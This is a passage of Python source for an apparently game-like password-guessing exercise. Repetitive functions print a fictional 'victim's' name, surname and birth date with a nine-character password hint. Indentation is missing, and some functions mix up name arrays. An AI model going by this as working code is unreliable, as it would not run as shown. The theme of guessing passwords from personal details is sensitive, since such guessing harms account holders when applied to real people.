print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms2 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[1])
print("Surname: "+ Level_1_Surnames[1])
print("Date of Birth: "+ Level_1_DOBs[1])
def Victims_Data_ELS3():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms3 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[2])
print("Surname: "+ Level_1_Surnames[2])
print("Date of Birth: "+ Level_1_DOBs[2])
def Victims_Data_ELS4():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms4 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[3])
print("Surname: "+ Level_1_Surnames[3])
print("Date of Birth: "+ Level_1_DOBs[3])
def Victims_Data_ELS5():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms5 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[4])
print("Surname: "+ Level_1_Surnames[4])
print("Date of Birth: "+ Level_1_DOBs[4])
def Victims_Data_ELS6():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms6 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[5])
print("Surname: "+ Level_1_Surnames[5])
print("Date of Birth: "+ Level_1_DOBs[5])
def Victims_Data_ELS7():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms7 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[6])
print("Surname: "+ Level_1_Surnames[6])
print("Date of Birth: "+ Level_1_DOBs[6])
def Victims_Data_ELS8():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms8 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[7])
print("Surname: "+ Level_1_Surnames[7])
print("Date of Birth: "+ Level_1_DOBs[7])
def Victims_Data_ELS9():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms9 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[8])
print("Surname: "+ Level_1_Surnames[8])
print("Date of Birth: "+ Level_1_DOBs[8])
def Victims_Data_ELS10():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms10 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[9])
print("Surname: "+ Level_1_Surnames[9])
print("Date of Birth: "+ Level_1_DOBs[9])
def Victims_Data_ELS11():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms11 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[10])
print("Surname: "+ Level_1_Surnames[10])
print("Date of Birth: "+ Level_1_DOBs[10])
def Victims_Data_ELS12():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms12 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[11])
print("Surname: "+ Level_1_Surnames[11])
print("Date of Birth: "+ Level_1_DOBs[11])
def Victims_Data_ELS13():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms13 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[12])
print("Surname: "+ Level_1_Surnames[12])
print("Date of Birth: "+ Level_1_DOBs[12])
def Victims_Data_ELS14():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms14 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[13])
print("Surname: "+ Level_1_Surnames[13])
print("Date of Birth: "+ Level_1_DOBs[13])
def Victims_Data_ELS15():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms15 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[14])
print("Surname: "+ Level_1_Surnames[14])
print("Date of Birth: "+ Level_1_DOBs[14])
def Victims_Data_ELS16():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms16 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[15])
print("Surname: "+ Level_1_Surnames[15])
print("Date of Birth: "+ Level_1_DOBs[15])
def Victims_Data_ELS17():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms17 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[16])
print("Surname: "+ Level_1_Surnames[16])
print("Date of Birth: "+ Level_1_DOBs[16])
def Victims_Data_ELS18():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms18 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[17])
print("Surname: "+ Level_1_Surnames[17])
print("Date of Birth: "+ Level_1_DOBs[17])
def Victims_Data_ELS19():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms19 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[18])
print("Surname: "+ Level_1_Surnames[18])
print("Date of Birth: "+ Level_1_DOBs[18])
def Victims_Data_ELS20():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms20 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[19])
print("Surname: "+ Level_1_Surnames[19])
print("Date of Birth: "+ Level_1_DOBs[19])
def Victims_Data_ELS21():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms21 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[20])
print("Surname: "+ Level_1_Surnames[20])
print("Date of Birth: "+ Level_1_DOBs[20])
def Victims_Data_ELS22():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms22 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[21])
print("Surname: "+ Level_1_Surnames[21])
print("Date of Birth: "+ Level_1_DOBs[21])
def Victims_Data_ELS23():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms23 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[22])
print("Surname: "+ Level_1_Surnames[22])
print("Date of Birth: "+ Level_1_DOBs[22])
def Victims_Data_ELS24():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms24 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[23])
print("Surname: "+ Level_1_Surnames[23])
print("Date of Birth: "+ Level_1_DOBs[23])
def Victims_Data_ELS25():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms25 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[24])
print("Surname: "+ Level_1_Surnames[24])
print("Date of Birth: "+ Level_1_DOBs[24])
def Victims_Data_ELS26():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms26 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[25])
print("Surname: "+ Level_1_Surnames[25])
print("Date of Birth: "+ Level_1_DOBs[25])
def Victims_Data_ELS27():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms27 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[26])
print("Surname: "+ Level_1_Surnames[26])
print("Date of Birth: "+ Level_1_DOBs[26])
def Victims_Data_ELS28():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms28 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[27])
print("Surname: "+ Level_1_Surnames[27])
print("Date of Birth: "+ Level_1_DOBs[27])
def Victims_Data_ELS29():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms29 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[28])
print("Surname: "+ Level_1_Surnames[28])
print("Date of Birth: "+ Level_1_DOBs[28])
def Victims_Data_ELS30():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms30 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[29])
print("Surname: "+ Level_1_Surnames[29])
print("Date of Birth: "+ Level_1_DOBs[29])
def Victims_Data_ELS31():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms31 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[30])
print("Surname: "+ Level_1_Surnames[30])
print("Date of Birth: "+ Level_1_DOBs[30])
def Victims_Data_ELS32():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms32 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[31])
print("Surname: "+ Level_1_Surnames[31])
print("Date of Birth: "+ Level_1_DOBs[31])
def Victims_Data_ELS33():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms33 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[32])
print("Surname: "+ Level_1_Surnames[32])
print("Date of Birth: "+ Level_1_DOBs[32])
def Victims_Data_ELS34():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms34 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[33])
print("Surname: "+ Level_1_Surnames[33])
print("Date of Birth: "+ Level_1_DOBs[33])
def Victims_Data_ELS35():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms35 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[34])
print("Surname: "+ Level_1_Surnames[34])
print("Date of Birth: "+ Level_1_DOBs[34])
#Victims data for Normal Levels
def Victims_Data_NLS1():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms1 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_2_Names[0])
print("Surname: "+ Level_2_Surnames[0])
print("Date of Birth: "+ Level_2_DOBs[0])
def Victims_Data_NLS2():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms2 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_2_Names[1])
print("Surname: "+ Level_2_Surnames[1])
print("Date of Birth: "+ Level_2_DOBs[1])
def Victims_Data_NLS3():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms3 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_2_Names[2])
print("Surname: "+ Level_2_Surnames[2])
print("Date of Birth: "+ Level_2_DOBs[2])
def Victims_Data_NLS4():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms4 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_2_Names[3])
print("Surname: "+ Level_2_Surnames[3])
print("Date of Birth: "+ Level_2_DOBs[3])
def Victims_Data_NLS5():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms5 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[4])
print("Surname: "+ Level_2_Surnames[4])
print("Date of Birth: "+ Level_2_DOBs[4])
def Victims_Data_NLS6():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms6 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[5])
print("Surname: "+ Level_2_Surnames[5])
print("Date of Birth: "+ Level_2_DOBs[5])
def Victims_Data_NLS7():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms7 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[6])
print("Surname: "+ Level_2_Surnames[6])
print("Date of Birth: "+ Level_2_DOBs[6])
def Victims_Data_NLS8():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms8 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[7])
print("Surname: "+ Level_2_Surnames[7])
print("Date of Birth: "+ Level_2_DOBs[7])
def Victims_Data_NLS9():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms9 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[8])
print("Surname: "+ Level_2_Surnames[8])
print("Date of Birth: "+ Level_2_DOBs[8])
def Victims_Data_NLS10():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms10 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[9])
print("Surname: "+ Level_2_Surnames[9])
print("Date of Birth: "+ Level_2_DOBs[9])
def Victims_Data_NLS11():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms11 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[10])
print("Surname: "+ Level_2_Surnames[10])
print("Date of Birth: "+ Level_2_DOBs[10])
def Victims_Data_NLS12():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms12 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[11])
print("Surname: "+ Level_2_Surnames[11])
print("Date of Birth: "+ Level_2_DOBs[11])
def Victims_Data_NLS13():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms13 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[12])
print("Surname: "+ Level_2_Surnames[12])
print("Date of Birth: "+ Level_2_DOBs[12])
def Victims_Data_NLS14():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms14 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[13])
print("Surname: "+ Level_2_Surnames[13])
print("Date of Birth: "+ Level_2_DOBs[13])
def Victims_Data_NLS15():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms15 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[14])
print("Surname: "+ Level_2_Surnames[14])
print("Date of Birth: "+ Level_2_DOBs[14])
def Victims_Data_NLS16():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms16 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[15])
print("Surname: "+ Level_2_Surnames[15])
print("Date of Birth: "+ Level_2_DOBs[15])
def Victims_Data_NLS17():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms17 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[16])
print("Surname: "+ Level_2_Surnames[16])
print("Date of Birth: "+ Level_2_DOBs[16])
def Victims_Data_NLS18():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms18 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[17])
print("Surname: "+ Level_2_Surnames[17])
print("Date of Birth: "+ Level_2_DOBs[17])
def Victims_Data_NLS19():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms19 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[18])
print("Surname: "+ Level_2_Surnames[18])
print("Date of Birth: "+ Level_2_DOBs[18])
def Victims_Data_NLS20():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms20 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[19])
print("Surname: "+ Level_2_Surnames[19])
print("Date of Birth: "+ Level_2_DOBs[19])
def Victims_Data_NLS21():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms21 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[20])
print("Surname: "+ Level_2_Surnames[20])
print("Date of Birth: "+ Level_2_DOBs[20])
def Victims_Data_NLS22():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms22 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[21])
print("Surname: "+ Level_2_Surnames[21])
print("Date of Birth: "+ Level_2_DOBs[21])
def Victims_Data_NLS23():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms23 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[22])
print("Surname: "+ Level_2_Surnames[22])
print("Date of Birth: "+ Level_2_DOBs[22])
def Victims_Data_NLS24():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms24 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[23])
print("Surname: "+ Level_2_Surnames[23])
print("Date of Birth: "+ Level_2_DOBs[23])
def Victims_Data_NLS25():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms25 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[24])
print("Surname: "+ Level_2_Surnames[24])
print("Date of Birth: "+ Level_2_DOBs[24])
def Victims_Data_NLS26():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms26 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[25])
print("Surname: "+ Level_2_Surnames[25])
print("Date of Birth: "+ Level_2_DOBs[25])
def Victims_Data_NLS27():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms27 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[26])
print("Surname: "+ Level_2_Surnames[26])
print("Date of Birth: "+ Level_2_DOBs[26])
def Victims_Data_NLS28():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms28 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[27])
print("Surname: "+ Level_2_Surnames[27])
print("Date of Birth: "+ Level_2_DOBs[27])
def Victims_Data_NLS29():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms29 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[28])
print("Surname: "+ Level_2_Surnames[28])
print("Date of Birth: "+ Level_2_DOBs[28])
def Victims_Data_NLS30():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms30 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[29])
print("Surname: "+ Level_2_Surnames[29])
print("Date of Birth: "+ Level_2_DOBs[29])
def Victims_Data_NLS31():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms31 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[30])
print("Surname: "+ Level_2_Surnames[30])
print("Date of Birth: "+ Level_2_DOBs[30])
def Victims_Data_NLS32():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms32 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[31])
print("Surname: "+ Level_2_Surnames[31])
print("Date of Birth: "+ Level_2_DOBs[31])
def Victims_Data_NLS33():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms33 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[32])
print("Surname: "+ Level_2_Surnames[32])
print("Date of Birth: "+ Level_2_DOBs[32])
def Victims_Data_NLS34():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms34 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[33])
print("Surname: "+ Level_2_Surnames[33])
print("Date of Birth: "+ Level_2_DOBs[33])
def Victims_Data_NLS35():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms35 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[34])
print("Surname: "+ Level_2_Surnames[34])
print("Date of Birth: "+ Level_2_DOBs[34])
#Victims data for Hard Levels
def Victims_Data_HLS1():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms1 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_2_Names[0])
print("Surname: "+ Level_2_Surnames[0])
print("Date of Birth: "+ Level_2_DOBs[0])
def Victims_Data_HLS2():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms2 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_2_Names[1])
print("Surname: "+ Level_2_Surnames[1])
print("Date of Birth: "+ Level_2_DOBs[1])
def Victims_Data_HLS3():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms3 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_2_Names[2])
print("Surname: "+ Level_2_Surnames[2])
print("Date of Birth: "+ Level_2_DOBs[2])
def Victims_Data_HLS4():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms4 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_2_Names[3])
print("Surname: "+ Level_2_Surnames[3])
print("Date of Birth: "+ Level_2_DOBs[3])
def Victims_Data_HLS5():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms5 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[4])
print("Surname: "+ Level_2_Surnames[4])
print("Date of Birth: "+ Level_2_DOBs[4])
def Victims_Data_HLS6():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms6 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[5])
print("Surname: "+ Level_2_Surnames[5])
print("Date of Birth: "+ Level_2_DOBs[5])
def Victims_Data_HLS7():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms7 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[6])
print("Surname: "+ Level_2_Surnames[6])
print("Date of Birth: "+ Level_2_DOBs[6])
def Victims_Data_HLS8():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms8 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[7])
print("Surname: "+ Level_2_Surnames[7])
print("Date of Birth: "+ Level_2_DOBs[7])
def Victims_Data_HLS9():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms9 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[8])
print("Surname: "+ Level_2_Surnames[8])
print("Date of Birth: "+ Level_2_DOBs[8])
def Victims_Data_HLS10():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms10 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[9])
print("Surname: "+ Level_2_Surnames[9])
print("Date of Birth: "+ Level_2_DOBs[9])
def Victims_Data_HLS11():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms11 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[10])
print("Surname: "+ Level_2_Surnames[10])
print("Date of Birth: "+ Level_2_DOBs[10])
def Victims_Data_HLS12():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms12 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[11])
print("Surname: "+ Level_2_Surnames[11])
print("Date of Birth: "+ Level_2_DOBs[11])
def Victims_Data_HLS13():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms13 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[12])
print("Surname: "+ Level_2_Surnames[12])
print("Date of Birth: "+ Level_2_DOBs[12])
def Victims_Data_HLS14():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms14 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[13])
print("Surname: "+ Level_2_Surnames[13])
print("Date of Birth: "+ Level_2_DOBs[13])
def Victims_Data_HLS15():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms15 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[14])
print("Surname: "+ Level_2_Surnames[14])
print("Date of Birth: "+ Level_2_DOBs[14])
def Victims_Data_HLS16():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms16 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[15])
print("Surname: "+ Level_2_Surnames[15])
print("Date of Birth: "+ Level_2_DOBs[15])
def Victims_Data_HLS17():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms17 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[16])
print("Surname: "+ Level_2_Surnames[16])
print("Date of Birth: "+ Level_2_DOBs[16])
def Victims_Data_HLS18():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms18 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[17])
print("Surname: "+ Level_2_Surnames[17])
print("Date of Birth: "+ Level_2_DOBs[17])
def Victims_Data_HLS19():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms19 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[18])
print("Surname: "+ Level_2_Surnames[18])
print("Date of Birth: "+ Level_2_DOBs[18])
def Victims_Data_HLS20():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms20 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[19])
print("Surname: "+ Level_2_Surnames[19])
print("Date of Birth: "+ Level_2_DOBs[19])
def Victims_Data_HLS21():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms21 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[20])
print("Surname: "+ Level_2_Surnames[20])
print("Date of Birth: "+ Level_2_DOBs[20])
def Victims_Data_HLS22():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms22 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[21])
